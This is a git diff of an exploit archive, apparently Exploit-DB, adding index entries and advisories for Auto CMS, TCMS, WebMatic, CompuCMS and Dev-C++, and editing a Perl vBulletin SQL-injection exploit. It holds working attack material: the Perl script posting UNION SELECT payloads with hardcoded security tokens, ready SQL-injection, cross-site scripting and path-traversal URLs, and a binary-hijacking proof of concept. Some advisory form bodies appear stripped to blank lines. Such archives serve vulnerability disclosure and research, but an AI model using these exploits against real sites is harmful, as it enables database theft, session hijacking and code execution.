diff --git a/files.csv b/files.csv index 37d7f77c1..d736fd0c6 100755 --- a/files.csv +++ b/files.csv @@ -31013,7 +31013,7 @@ id,file,description,date,author,platform,type,port 34431,platforms/linux/remote/34431.html,"Nagios XI Multiple Cross Site Request Forgery Vulnerabilities",2010-08-07,"Adam Baldwin",linux,remote,0 34432,platforms/php/webapps/34432.txt,"Wowd 'index.html' Multiple Cross Site Scripting Vulnerabilities",2009-10-29,Lostmon,php,webapps,0 34433,platforms/php/webapps/34433.txt,"Simple Directory Listing 2.1 'SDL2.php' Cross Site Scripting Vulnerability",2010-10-22,"Amol Naik",php,webapps,0 -34436,platforms/php/webapps/34436.txt,"WordPress ShortCode Plugin 1.1 - Local File Inclusion Vulnerability",2014-08-28,"Mehdi Karout and Christian Galeone",php,webapps,0 +34436,platforms/php/webapps/34436.txt,"WordPress ShortCode Plugin 0.2.3 - Local File Inclusion Vulnerability",2014-08-28,"Mehdi Karout and Christian Galeone",php,webapps,0 34437,platforms/windows/remote/34437.txt,"Portable Document Format - Specification Signature Collision Vulnerability",2010-08-11,"Florian Zumbiehl",windows,remote,0 34438,platforms/php/webapps/34438.txt,"MybbCentral TagCloud 2.0 'Topic' Field HTML Injection Vulnerability",2010-08-11,3ethicalhackers.com,php,webapps,0 34439,platforms/multiple/remote/34439.txt,"ServletExec Directory Traversal Vulnerability and Multiple Authentication-Bypass Vulnerabilities",2010-08-12,"Stefano Di Paola",multiple,remote,0 @@ -31099,3 +31099,8 @@ id,file,description,date,author,platform,type,port 34528,platforms/multiple/dos/34528.py,"Adobe Acrobat and Reader <= 9.3.4 'AcroForm.api' Memory Corruption Vulnerability",2010-08-25,ITSecTeam,multiple,dos,0 34530,platforms/windows/dos/34530.py,"Crystal Player v1.98 '.mls' File Buffer Overflow Vulnerability",2010-08-20,"Praveen Darshanam",windows,dos,0 34531,platforms/php/webapps/34531.txt,"BlastChat Client 3.3 Cross Site Scripting Vulnerability",2010-08-25,"Aung Khant",php,webapps,0 +34532,platforms/windows/remote/34532.c,"Bloodshed Dev-C++ 4.9.9.2 Multiple EXE Loading Arbitrary Code Execution Vulnerability",2010-08-25,storm,windows,remote,0 +34533,platforms/php/webapps/34533.txt,"Auto CMS 1.6 'autocms.php' Cross-Site Scripting Vulnerability",2010-08-23,"High-Tech Bridge SA",php,webapps,0 +34534,platforms/php/webapps/34534.txt,"TCMS Multiple Input Validation Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0 +34535,platforms/php/webapps/34535.txt,"Valarsoft WebMatic 3.0.5 Multiple HTML Injection Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0 +34536,platforms/php/webapps/34536.txt,"CompuCMS Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0 diff --git a/platforms/php/webapps/34436.txt b/platforms/php/webapps/34436.txt index 4d2b005a7..717eff1e7 100755 --- a/platforms/php/webapps/34436.txt +++ b/platforms/php/webapps/34436.txt @@ -4,7 +4,7 @@ # Severity : High+/Critical # Reporter(s) : Mehdi Karout & Christian Galeone # Google Dork : inurl:wp/wp-content/force-download.php -# Plugin Version : 1.1 +# Plugin Version : 0.2.3 # Plugin Name : Download ShortCode # Plugin Download Link : http://downloads.wordpress.org/plugin/download-shortcode.1.1.zip # Vendor Home : http://werdswords.com/ diff --git a/platforms/php/webapps/34526.pl b/platforms/php/webapps/34526.pl index 0543d491b..c075ea5ee 100755 --- a/platforms/php/webapps/34526.pl +++ b/platforms/php/webapps/34526.pl @@ -6,8 +6,7 @@ # Tested on: vBulletin 4.1.2 # Usage: perl exploit.pl # Tutorial video: https://www.youtube.com/watch?v=_jec3nkoYFc -# IMPORTANT: At the first execution of the exploit I suggest you to login and logout to the forum (with a browser), then running it in order to allow the exploit to retrieve the correct security token to use. If you run more than one time the exploit, it may not get the security token because of the previous session's cookies and so you may have some problems retrieving the correct information. THE SOLUTION IS to copy the correct security token previously found (usually at the first run) and paste it into the source code where I wrote 'HERE'. -# Vulnerability discovered by: D4rkB1t (http://www.exploit-db.com/exploits/17314/) +# Vulnerability discovered by: D4rkB1t #!/usr/bin/env perl use LWP::UserAgent; @@ -24,13 +23,14 @@ $salt = "salt) from user where userid=$ARGV[4]#"; sub request { + $req = HTTP::Request->new(GET => $ARGV[0]); + my $res1 = $ua->request($req); + open(FILE01, "> vbloginout.txt"); print FILE01 $res1->content; close(FILE01); my $token = dumping("vbloginout.txt","token"); - - if($token eq '') + if($token eq '' || $token eq 'guest') { - print "SECURITYTOKEN not found (Make sure to log out from any other previous logged sessions before running the exploit).\n"; - #print "Attempting using 1409594055-f2133dfe1f26a36f6349eb3a946ac38c94a182e6 as token.\n"; - $token = "1409750140-51ac26286027a4bc2b2ac38a7483081c2a4b2a3e"; # HERE + print "SECURITYTOKEN not found!\n"; + $token = "1409782759-e58c864fcc4e1ec7e23d31439af4b8cc181b789f"; # HERE print "Attempting using $token as token.\n"; } else @@ -48,7 +48,6 @@ sub request $post = "query=$ARGV[3]&titleonly=0&dosearch=Search+Now&memberless=0&memberlimit=&discussionless=0&discussionlimit=&messageless=0&messagelimit=&pictureless=0&picturelimit=&sortby=dateline&order=descending&group_filter_date_lteq_month=0&group_filter_date_lteq_day=1&group_filter_date_lteq_year=&group_filter_date_gteq_month=0&group_filter_date_gteq_day=1&group_filter_date_gteq_year=&saveprefs=1&s=&securitytoken=$token&dofilter=1&do=process&searchfromtype=vBForum%3ASocialGroup&contenttypeid=7&cat[0]=1) UNION SELECT concat(0x3a,0x3a,0x3a,$tofind"; $req->content($post); my $res = $ua->request($req); - #print $res->headers()->as_string; print "\n\n"; open(FILE0, "> vbloc.txt"); print FILE0 $res->headers()->as_string; close(FILE0); my $location = dumping("vbloc.txt","loc"); @@ -57,11 +56,10 @@ sub request banner(); break; } - #print "Location: $location\n"; + my $req1 = HTTP::Request->new(GET => $location); $req1->content_type('application/x-www-form-urlencoded'); my $res1 = $ua->request($req1); - #print $res1->content; print "\n"; open(FILE,"> vbout.txt"); print FILE $res1->content; close(FILE); @@ -91,7 +89,6 @@ sub second_request $post = "type%5B%5D=7&query=$ARGV[3]&titleonly=0&searchuser=&exactname=1&tag=&dosearch=Search+Now&searchdate=0&beforeafter=&sortby=relevance&order=descending&saveprefs=1&s=&securitytoken=$token&do=process&searchthreadid=&cat[0]=1) UNION SELECT concat(0x3a,0x3a,0x3a,$tofind"; $req->content($post); my $res = $ua->request($req); - #print $res->headers()->as_string; print "\n\n"; open(FILE0, "> vbloc.txt"); print FILE0 $res->headers()->as_string; close(FILE0); my $location = dumping("vbloc.txt","loc"); @@ -100,11 +97,10 @@ sub second_request banner(); exit(1); } - #print "Location: $location\n"; + my $req1 = HTTP::Request->new(GET => $location); $req1->content_type('application/x-www-form-urlencoded'); my $res1 = $ua->request($req1); - #print $res1->content; print "\n"; open(FILE,"> vbout.txt"); print FILE $res1->content; close(FILE); @@ -219,8 +215,6 @@ sub login(@) $req->content("vb_login_username=$username&vb_login_password=$password&s=&securitytoken=1409514185-74f04ec0932a6f070268bf287797b5dc0db05530&do=login&vb_login_md5password=&vb_login_md5password_utf="); $ua->cookie_jar({}); my $res = $ua->request($req); - #print "\n"; print $res->content; print "\n"; - open(FILE2,"> vbloginout.txt"); print FILE2 $res->content; close(FILE2); request(); } diff --git a/platforms/php/webapps/34533.txt b/platforms/php/webapps/34533.txt new file mode 100755 index 000000000..e49c36a0b --- /dev/null +++ b/platforms/php/webapps/34533.txt @@ -0,0 +1,30 @@ +source: http://www.securityfocus.com/bid/42764/info + +Auto CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Auto CMS 1.6 is vulnerable; other versions may be affected. + +
+ + + +' /> + + + + + + + + + + + + + +
+ \ No newline at end of file diff --git a/platforms/php/webapps/34534.txt b/platforms/php/webapps/34534.txt new file mode 100755 index 000000000..cbb3618bb --- /dev/null +++ b/platforms/php/webapps/34534.txt @@ -0,0 +1,53 @@ +source: http://www.securityfocus.com/bid/42766/info + +TCMS is prone to multiple input-validation vulnerabilities, including a local file-include vulnerability, a local file-disclosure vulnerability, multiple SQL-injection vulnerabilities, and multiple cross-site scripting vulnerabilities. + +An attacker can exploit these vulnerabilities to steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, obtain potentially sensitive information, or execute arbitrary local scripts in the context of the webserver process; other attacks are also possible. + +http://www.example.com/www/index.php?admin=1§ion=content&action=edit&id=PAGE_ID'+ANY_SQL +http://www.example.com/www/index.php?template=home&content=home'+ANY_SQL +http://www.example.com/www/index.php?template=forum&action=showReplies&index=1'+ANY_SQL_CODE +http://www.example.com/www/index.php?template=blog&id=1'+ANY_SQL_CODE + +
+ + + + + + + + + + + + +
+ + + +
+ + + + + + + + + + + + +http://www.example.com/www/index.php?admin=1§ion=language">&action=addLanguage + +
+ + +http://www.example.com/www/index.php?template=./../../../../../../../tmp/test.php%00 + +http://www.example.com/www/index.php?admin=1§ion=style&action=editStylesheet&name=./../../../../../../../tmp/test.php diff --git a/platforms/php/webapps/34535.txt b/platforms/php/webapps/34535.txt new file mode 100755 index 000000000..e0105b2d0 --- /dev/null +++ b/platforms/php/webapps/34535.txt @@ -0,0 +1,61 @@ +source: http://www.securityfocus.com/bid/42767/info + +Valarsoft WebMatic is prone to multiple HTML-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. + +Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +Valarsoft WebMatic 3.0.5 is vulnerable; other versions may also be affected. + +
+ + + + +' /> + + + + + + + + + + +
+ + +
+ +' /> + + + + + + + + + + + + + + + + + + + + + + + + + +
+ diff --git a/platforms/php/webapps/34536.txt b/platforms/php/webapps/34536.txt new file mode 100755 index 000000000..a25454647 --- /dev/null +++ b/platforms/php/webapps/34536.txt @@ -0,0 +1,23 @@ +source: http://www.securityfocus.com/bid/42773/info + +CompuCMS is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/index.asp?mode=visresultat&sogeord=%27+ANY_SQL_CODE + +http://www.example.com/index.asp?mode=for!forside!gb&sprog=gb'"> + +http://www.example.com/_CompuCMS/_CMS_output/_viskarrusel.inc.asp?mode=alm!udflugtsmaal!dk&vispic=2138&Dir=&site=demo%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ed&NoElementNum=0&NoFirstElement + +http://www.example.com/_CompuCMS/_CMS_output/_viskarrusel.inc.asp?mode=alm!udflugtsmaal!dk&vispic=2138&Dir=%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C&site=demo&NoElementNum=0&NoFirstElement + +http://www.example.com/_CompuCMS/_CMS_output/_viskarrusel.inc.asp?mode=alm!udflugtsmaal!dk%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C&vispic=2138&Dir=&site=demo&NoElementNum=0&NoFirstElement + +http://www.example.com/_CompuCMS/_CMS_output/_visbillede.asp?billede=1.jpg&tekst=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E + +http://www.example.com/_CompuCMS/_CMS_output/_visbillede.asp?billede=1.jpg%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&tekst= + +http://www.example.com/_CompuCMS/_CMS_output/_viskarrusel.inc.asp?mode=alm!udflugtsmaal!dk&vispic=2138+ANY_SQL_CODE&Dir=www.compucms.dk/demo/&site=demo&NoElementNum=0&NoFirstElement + +http://www.example.com/demo/index.asp?mode=nyh!forside~1220010667!dk&visid=383%27+ANY_SQL_CODE diff --git a/platforms/windows/remote/34532.c b/platforms/windows/remote/34532.c new file mode 100755 index 000000000..f1738a022 --- /dev/null +++ b/platforms/windows/remote/34532.c @@ -0,0 +1,34 @@ +source: http://www.securityfocus.com/bid/42737/info + +Bloodshed Dev-C++ is prone to a vulnerability that lets attackers execute arbitrary code. This issue affects 'make.exe' and 'minw32-make.exe'. + +An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to compile a file from a network share location that contains a specially crafted executable file. + +Bloodshed Dev-C++ 4.9.9.2 is vulnerable; other versions may also be affected. + +/* +Exploit Title: Bloodshed Dev-C++ Binary Hijacking Exploit (make.exe, mingw32-make.exe) +Date: August 25, 2010 +Author: storm (storm@gonullyourself.org) +Version: 4.9.9.2 +Tested on: Windows Vista SP2 + +http://www.gonullyourself.org/ + +gcc -o make.exe Dev-C++-Binary.c +gcc -o mingw32-make.exe Dev-C++-Binary.c + +...and place in appropriate directory. Executes your code four times. + +Every file extension associated with Dev-C++ (.c, .cpp, .dev, .h, .hpp, .rc, .template) is affected. Dev-C++ Package Manager files (.devpackage, .devpak) are not affected, however. + +*/ + +#include + +int main() +{ + WinExec("calc", 0); + exit(0); + return 0; +}